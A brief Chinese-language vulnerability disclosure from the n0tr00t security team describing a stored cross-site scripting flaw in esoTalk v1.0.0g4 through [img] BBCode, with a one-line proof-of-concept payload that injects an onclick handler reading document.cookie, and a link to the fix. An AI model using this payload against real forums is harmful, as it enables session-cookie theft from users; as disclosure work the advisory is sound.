~# n0tr00t Security Team

Esotalk v1.0.0g4 [img]所导致的存储型跨站漏洞

07 Dec 2014 - evi1m0

[+] Author: evi1m0
[+] Team: n0tr00t security team 
[+] From: http://www.n0tr00t.com
[+] Create: 2014-12-07

0x01 about

esoTalk是一款国外拥有众多优势的免费,开源的基于PHP和MySQL下的网页应用。 她的设计极为简介,速度极快,超轻量级别并且有良好的可拓展性。

Website: [http://esotalk.org/]

Github: [https://github.com/esotalk/esoTalk]

0x02 proof of concept

这次与 /2014/11/01/hsdb-0006.html 稍微有些不同的是,[img]所导致的:

[img][url=http://onclick=alert(document.cookie)//.com]http://www.hackersoul.com/image.jpg[/url][/img]

0x03 fix

https://github.com/esotalk/esoTalk/issues/401